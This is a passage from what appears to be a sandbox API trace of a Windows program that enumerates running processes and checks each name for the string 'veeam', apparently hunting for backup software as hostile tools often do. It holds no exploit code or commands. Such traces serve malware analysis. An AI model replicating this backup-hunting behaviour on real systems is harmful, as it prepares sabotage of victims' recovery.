(in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.942] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542298 [0091.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542298, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.942] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.942] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.942] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.943] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542160 [0091.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542160, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.943] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.943] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.943] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.944] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542190 [0091.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542190, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.944] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.944] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.944] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.946] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35422e0 [0091.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35422e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.946] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.946] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.948] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542088 [0091.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.948] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.948] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.948] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0091.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.950] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542238 [0091.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3542238, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0091.950] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0091.950] StrStrIA (lpFirst="spoolsv.exe", lpSrch="veeam") returned 0x0 [0091.950] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.951] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35420e8 [0091.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35420e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.951] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.951] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0091.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.953] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35420b8 [0091.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x35420b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0091.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0091.953] StrStrIA (lpFirst="audiodg.exe", lpSrch="veeam") returned 0x0 [0091.953] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0091.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.954] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x35422b0 [0091.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x35422b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0091.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0091.954] StrStrIA (lpFirst="sihost.exe", lpSrch="veeam") returned 0x0 [0091.954] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.955] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35422c8 [0091.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35422c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.955] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.956] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0091.956] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.957] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3542340 [0091.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3542340, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.957] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.957] StrStrIA (lpFirst="taskhostw.exe", lpSrch="veeam") returned 0x0 [0091.957] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0091.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.958] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542370 [0091.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3542370, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0091.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0091.958] StrStrIA (lpFirst="explorer.exe", lpSrch="veeam") returned 0x0 [0091.958] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0091.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.959] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3536bf0 [0091.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3536bf0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0091.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0091.959] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="veeam") returned 0x0 [0091.959] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0091.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0091.960] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355cb78 [0091.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x355cb78, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0091.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0091.960] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="veeam") returned 0x0 [0091.960] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0091.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.961] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3536c50 [0091.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3536c50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0091.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0091.961] StrStrIA (lpFirst="Memory Compression", lpSrch="veeam") returned 0x0 [0091.962] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0091.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0091.962] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3536d30 [0091.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3536d30, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0091.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0091.966] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="veeam") returned 0x0 [0091.966] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0091.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.967] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542100 [0091.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x3542100, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0091.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0091.967] StrStrIA (lpFirst="SearchUI.exe", lpSrch="veeam") returned 0x0 [0091.967] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0091.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.968] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3536d50 [0091.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3536d50, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0091.968] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0091.968] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="veeam") returned 0x0 [0091.968] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0091.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.969] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35420a0 [0091.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35420a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0091.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0091.969] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="veeam") returned 0x0 [0091.969] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0091.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.970] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542538 [0091.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x3542538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0091.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0091.970] StrStrIA (lpFirst="pending.exe", lpSrch="veeam") returned 0x0 [0091.970] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0091.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0091.971] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x355cb50 [0091.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x355cb50, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0091.971] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0091.971] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="veeam") returned 0x0 [0091.971] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0091.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.972] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3536d70 [0091.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3536d70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0091.972] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0091.972] StrStrIA (lpFirst="swing prefer.exe", lpSrch="veeam") returned 0x0 [0091.972] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0091.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0091.973] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x355c970 [0091.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x355c970, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0091.973] lstrcpyA (in: lpString1=0x567fabc, 